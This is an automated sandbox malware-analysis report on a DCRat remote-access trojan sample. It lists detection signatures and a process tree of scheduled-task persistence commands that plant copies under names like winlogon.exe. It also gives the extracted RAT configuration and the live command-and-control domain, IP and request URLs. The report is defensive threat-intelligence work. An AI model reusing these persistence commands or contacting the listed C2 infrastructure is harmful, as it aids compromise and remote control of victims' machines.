Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
5P9EdUgv5r.exe

Overview

General Information

Sample name:5P9EdUgv5r.exe
renamed because original name is a hash value
Original sample name:1F70E167B93D471AF9DAF333145DB4CD.exe
Analysis ID:1502154
MD5:1f70e167b93d471af9daf333145db4cd
SHA1:b7c1afc111a98055b28c94f62599ff33f41ced24
SHA256:9fbc9f10ad8bc902a7a847d76b9792ac9f995555e856824f96fd04b7290b5aed
Tags:DCRatexe
Infos:

Detection

DCRat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
Yara detected DCRat
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Creates processes via WMI
Disable UAC(promptonsecuredesktop)
Disables UAC (registry)
Drops executables to the windows directory (C:\Windows) and starts them
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Files With System Process Name In Unsuspected Locations
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • 5P9EdUgv5r.exe (PID: 1376 cmdline: "C:\Users\user\Desktop\5P9EdUgv5r.exe" MD5: 1F70E167B93D471AF9DAF333145DB4CD)
    • wscript.exe (PID: 4588 cmdline: "C:\Windows\System32\WScript.exe" "C:\serversessionmonitor\1ogacUYksBebmJ8WSR.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 5312 cmdline: C:\Windows\system32\cmd.exe /c ""C:\serversessionmonitor\ovpXJB1x2XJwVqS.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • blockfont.exe (PID: 7076 cmdline: "C:\serversessionmonitor\blockfont.exe" MD5: 960DC58A366579A52C966ACC596733B6)
          • schtasks.exe (PID: 6888 cmdline: schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\windows portable devices\winlogon.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7180 cmdline: schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files (x86)\windows portable devices\winlogon.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7208 cmdline: schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\windows portable devices\winlogon.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7336 cmdline: schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNrq" /sc MINUTE /mo 9 /tr "'C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7364 cmdline: schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNr" /sc ONLOGON /tr "'C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7384 cmdline: schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNrq" /sc MINUTE /mo 14 /tr "'C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7404 cmdline: schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\windows media player\en-US\backgroundTaskHost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7420 cmdline: schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Program Files (x86)\windows media player\en-US\backgroundTaskHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7456 cmdline: schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\windows media player\en-US\backgroundTaskHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7484 cmdline: schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNrq" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\microsoft onedrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7500 cmdline: schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNr" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft onedrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7532 cmdline: schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNrq" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\microsoft onedrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7572 cmdline: schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNrq" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7600 cmdline: schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNr" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7628 cmdline: schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNrq" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7652 cmdline: schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 6 /tr "'C:\Recovery\SearchApp.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7668 cmdline: schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Recovery\SearchApp.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7684 cmdline: schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 8 /tr "'C:\Recovery\SearchApp.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7720 cmdline: schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNrq" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\windows mail\qwhJcOiWbbUoQMvwnJNr.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7740 cmdline: schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNr" /sc ONLOGON /tr "'C:\Program Files (x86)\windows mail\qwhJcOiWbbUoQMvwnJNr.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7760 cmdline: schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNrq" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\windows mail\qwhJcOiWbbUoQMvwnJNr.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7788 cmdline: schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNrq" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\microsoft office\Office16\qwhJcOiWbbUoQMvwnJNr.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7808 cmdline: schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNr" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft office\Office16\qwhJcOiWbbUoQMvwnJNr.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7824 cmdline: schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNrq" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\microsoft office\Office16\qwhJcOiWbbUoQMvwnJNr.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • qwhJcOiWbbUoQMvwnJNr.exe (PID: 7900 cmdline: "C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe" MD5: 960DC58A366579A52C966ACC596733B6)
  • qwhJcOiWbbUoQMvwnJNr.exe (PID: 7508 cmdline: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exe MD5: 960DC58A366579A52C966ACC596733B6)
  • qwhJcOiWbbUoQMvwnJNr.exe (PID: 7552 cmdline: "C:\Program Files (x86)\microsoft onedrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exe" MD5: 960DC58A366579A52C966ACC596733B6)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Malware Configuration

Threatname: DCRat

{"SCRT": "{\"0\":\">\",\"L\":\"~\",\"y\":\"^\",\"o\":\"&\",\"h\":\"*\",\"c\":\"`\",\"A\":\"|\",\"i\":\")\",\"n\":\",\",\"9\":\"_\",\"1\":\"-\",\"I\":\";\",\"J\":\"!\",\"j\":\"%\",\"d\":\".\",\"e\":\"@\",\"C\":\"$\",\"M\":\"#\",\"W\":\" \",\"z\":\"<\",\"N\":\"(\"}", "PCRT": "{\"5\":\"$\",\"Z\":\"&\",\"D\":\"|\",\"a\":\";\",\"U\":\" \",\"E\":\">\",\"R\":\"-\",\"F\":\",\",\"t\":\"~\",\"Q\":\"@\",\"i\":\"%\",\"T\":\"#\",\"Y\":\"^\",\"d\":\"<\",\"4\":\"_\",\"h\":\")\",\"l\":\"!\",\"k\":\"`\",\"J\":\".\",\"X\":\"(\",\"B\":\"*\"}", "TAG": "", "MUTEX": "DCR_MUTEX-7082klfQ9GyGfgjPd35M", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.1784999674.0000000003657000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
    00000004.00000002.1784999674.000000000365B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
      00000016.00000002.1870704533.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
        00000014.00000002.1870320993.0000000002E11000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
          00000016.00000002.1870704533.000000000302C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
            Click to see the 8 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Files With System Process Name In Unsuspected Locations
            Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\serversessionmonitor\blockfont.exe, ProcessId: 7076, TargetFilename: C:\Program Files (x86)\windows portable devices\winlogon.exe
            Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\serversessionmonitor\1ogacUYksBebmJ8WSR.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\serversessionmonitor\1ogacUYksBebmJ8WSR.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\5P9EdUgv5r.exe", ParentImage: C:\Users\user\Desktop\5P9EdUgv5r.exe, ParentProcessId: 1376, ParentProcessName: 5P9EdUgv5r.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\serversessionmonitor\1ogacUYksBebmJ8WSR.vbe" , ProcessId: 4588, ProcessName: wscript.exe

            Persistence and Installation Behavior

            barindex
            Sigma detected: Schedule system process
            Source: Process startedAuthor: Joe Security: Data: Command: schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\windows portable devices\winlogon.exe'" /f, CommandLine: schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\windows portable devices\winlogon.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\serversessionmonitor\blockfont.exe" , ParentImage: C:\serversessionmonitor\blockfont.exe, ParentProcessId: 7076, ParentProcessName: blockfont.exe, ProcessCommandLine: schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\windows portable devices\winlogon.exe'" /f, ProcessId: 6888, ProcessName: schtasks.exe

            Suricata Signatures

            Timestamp:2024-08-31T09:22:11.861438+0200
            SID:2034194
            Severity:1
            Source Port:49734
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: 5P9EdUgv5r.exeAvira: detected
            Antivirus detection for URL or domain
            Source: http://a1023624.xsph.ruAvira URL Cloud: Label: malware
            Source: http://a1023624.xsph.ru/Avira URL Cloud: Label: malware
            Source: http://a1023624.xsph.ru/1ffc0666.php?D6sO3=coW9eQnQdwC&8Qdw2X=mrLKL&03ZD=Zcs&494c04091cad695e488cec836843e29b=14eed2ab8e75c30d5e3051e42b208839&97fa7d33edb300ced93fc3fe0e6b5970=gMxYzM1kzY5YmY1QWNzQTZhJjNjhTZ0QDZ2ITY3MTZjJWMmNWO5YmN&D6sO3=coW9eQnQdwC&8Qdw2X=mrLKL&03ZD=ZcsAvira URL Cloud: Label: malware
            Source: http://a1023624.xsph.ru/1ffc0666.php?D6sO3=coW9eQnQdwC&8Qdw2X=mrLKL&03ZD=Zcs&494c04091cad695e488cec8Avira URL Cloud: Label: malware
            Antivirus detection for dropped file
            Source: C:\serversessionmonitor\blockfont.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Program Files (x86)\Windows Media Player\en-US\backgroundTaskHost.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Program Files (x86)\Microsoft Office\Office16\qwhJcOiWbbUoQMvwnJNr.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Program Files (x86)\Microsoft Office\Office16\qwhJcOiWbbUoQMvwnJNr.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\serversessionmonitor\1ogacUYksBebmJ8WSR.vbeAvira: detection malicious, Label: VBS/Runner.VPG
            Source: C:\Program Files (x86)\Windows Portable Devices\winlogon.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Program Files (x86)\Microsoft Office\Office16\qwhJcOiWbbUoQMvwnJNr.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Program Files (x86)\Microsoft Office\Office16\qwhJcOiWbbUoQMvwnJNr.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Recovery\SearchApp.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Program Files (x86)\Microsoft Office\Office16\qwhJcOiWbbUoQMvwnJNr.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Found malware configuration
            Source: 00000004.00000002.1790371382.00000000132BF000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"SCRT": "{\"0\":\">\",\"L\":\"~\",\"y\":\"^\",\"o\":\"&\",\"h\":\"*\",\"c\":\"`\",\"A\":\"|\",\"i\":\")\",\"n\":\",\",\"9\":\"_\",\"1\":\"-\",\"I\":\";\",\"J\":\"!\",\"j\":\"%\",\"d\":\".\",\"e\":\"@\",\"C\":\"$\",\"M\":\"#\",\"W\":\" \",\"z\":\"<\",\"N\":\"(\"}", "PCRT": "{\"5\":\"$\",\"Z\":\"&\",\"D\":\"|\",\"a\":\";\",\"U\":\" \",\"E\":\">\",\"R\":\"-\",\"F\":\",\",\"t\":\"~\",\"Q\":\"@\",\"i\":\"%\",\"T\":\"#\",\"Y\":\"^\",\"d\":\"<\",\"4\":\"_\",\"h\":\")\",\"l\":\"!\",\"k\":\"`\",\"J\":\".\",\"X\":\"(\",\"B\":\"*\"}", "TAG": "", "MUTEX": "DCR_MUTEX-7082klfQ9GyGfgjPd35M", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false}
            Multi AV Scanner detection for domain / URL
            Source: a1023624.xsph.ruVirustotal: Detection: 5%Perma Link
            Source: http://a1023624.xsph.ruVirustotal: Detection: 5%Perma Link
            Source: http://a1023624.xsph.ru/Virustotal: Detection: 5%Perma Link
            Multi AV Scanner detection for dropped file
            Source: C:\Program Files (x86)\Microsoft Office\Office16\qwhJcOiWbbUoQMvwnJNr.exeReversingLabs: Detection: 87%
            Source: C:\Program Files (x86)\Microsoft Office\Office16\qwhJcOiWbbUoQMvwnJNr.exeVirustotal: Detection: 68%Perma Link
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeReversingLabs: Detection: 87%
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeVirustotal: Detection: 68%Perma Link
            Source: C:\Program Files (x86)\Windows Mail\qwhJcOiWbbUoQMvwnJNr.exeReversingLabs: Detection: 87%
            Source: C:\Program Files (x86)\Windows Mail\qwhJcOiWbbUoQMvwnJNr.exeVirustotal: Detection: 68%Perma Link
            Source: C:\Program Files (x86)\Windows Media Player\en-US\backgroundTaskHost.exeReversingLabs: Detection: 87%
            Source: C:\Program Files (x86)\Windows Media Player\en-US\backgroundTaskHost.exeVirustotal: Detection: 68%Perma Link
            Source: C:\Program Files (x86)\Windows Portable Devices\winlogon.exeReversingLabs: Detection: 87%
            Source: C:\Program Files (x86)\Windows Portable Devices\winlogon.exeVirustotal: Detection: 68%Perma Link
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeReversingLabs: Detection: 87%
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeVirustotal: Detection: 68%Perma Link
            Source: C:\Recovery\SearchApp.exeReversingLabs: Detection: 87%
            Source: C:\Recovery\SearchApp.exeVirustotal: Detection: 68%Perma Link
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeReversingLabs: Detection: 87%
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeVirustotal: Detection: 68%Perma Link
            Source: C:\serversessionmonitor\blockfont.exeReversingLabs: Detection: 87%
            Source: C:\serversessionmonitor\blockfont.exeVirustotal: Detection: 68%Perma Link
            Multi AV Scanner detection for submitted file
            Source: 5P9EdUgv5r.exeReversingLabs: Detection: 71%
            Source: 5P9EdUgv5r.exeVirustotal: Detection: 61%Perma Link
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
            Machine Learning detection for dropped file
            Source: C:\serversessionmonitor\blockfont.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\Windows Media Player\en-US\backgroundTaskHost.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\Microsoft Office\Office16\qwhJcOiWbbUoQMvwnJNr.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\Microsoft Office\Office16\qwhJcOiWbbUoQMvwnJNr.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\Windows Portable Devices\winlogon.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\Microsoft Office\Office16\qwhJcOiWbbUoQMvwnJNr.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\Microsoft Office\Office16\qwhJcOiWbbUoQMvwnJNr.exeJoe Sandbox ML: detected
            Source: C:\Recovery\SearchApp.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\Microsoft Office\Office16\qwhJcOiWbbUoQMvwnJNr.exeJoe Sandbox ML: detected
            Machine Learning detection for sample
            Source: 5P9EdUgv5r.exeJoe Sandbox ML: detected
            Source: 5P9EdUgv5r.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: C:\serversessionmonitor\blockfont.exeDirectory created: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeDirectory created: C:\Program Files\Windows Portable Devices\8057c8f30c1a8eJump to behavior
            Source: 5P9EdUgv5r.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 5P9EdUgv5r.exe
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeCode function: 0_2_00D6A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00D6A5F4
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeCode function: 0_2_00D7B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00D7B8E0

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.4:49734 -> 141.8.194.149:80
            Source: Joe Sandbox ViewIP Address: 141.8.194.149 141.8.194.149
            Source: Joe Sandbox ViewASN Name: SPRINTHOSTRU SPRINTHOSTRU
            Source: global trafficHTTP traffic detected: GET /1ffc0666.php?D6sO3=coW9eQnQdwC&8Qdw2X=mrLKL&03ZD=Zcs&494c04091cad695e488cec836843e29b=14eed2ab8e75c30d5e3051e42b208839&97fa7d33edb300ced93fc3fe0e6b5970=gMxYzM1kzY5YmY1QWNzQTZhJjNjhTZ0QDZ2ITY3MTZjJWMmNWO5YmN&D6sO3=coW9eQnQdwC&8Qdw2X=mrLKL&03ZD=Zcs HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: a1023624.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /1ffc0666.php?D6sO3=coW9eQnQdwC&8Qdw2X=mrLKL&03ZD=Zcs&494c04091cad695e488cec836843e29b=14eed2ab8e75c30d5e3051e42b208839&97fa7d33edb300ced93fc3fe0e6b5970=gMxYzM1kzY5YmY1QWNzQTZhJjNjhTZ0QDZ2ITY3MTZjJWMmNWO5YmN&D6sO3=coW9eQnQdwC&8Qdw2X=mrLKL&03ZD=Zcs HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: a1023624.xsph.ru
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /1ffc0666.php?D6sO3=coW9eQnQdwC&8Qdw2X=mrLKL&03ZD=Zcs&494c04091cad695e488cec836843e29b=14eed2ab8e75c30d5e3051e42b208839&97fa7d33edb300ced93fc3fe0e6b5970=gMxYzM1kzY5YmY1QWNzQTZhJjNjhTZ0QDZ2ITY3MTZjJWMmNWO5YmN&D6sO3=coW9eQnQdwC&8Qdw2X=mrLKL&03ZD=Zcs HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: a1023624.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /1ffc0666.php?D6sO3=coW9eQnQdwC&8Qdw2X=mrLKL&03ZD=Zcs&494c04091cad695e488cec836843e29b=14eed2ab8e75c30d5e3051e42b208839&97fa7d33edb300ced93fc3fe0e6b5970=gMxYzM1kzY5YmY1QWNzQTZhJjNjhTZ0QDZ2ITY3MTZjJWMmNWO5YmN&D6sO3=coW9eQnQdwC&8Qdw2X=mrLKL&03ZD=Zcs HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: a1023624.xsph.ru
            Source: global trafficDNS traffic detected: DNS query: a1023624.xsph.ru
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Sat, 31 Aug 2024 07:22:11 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 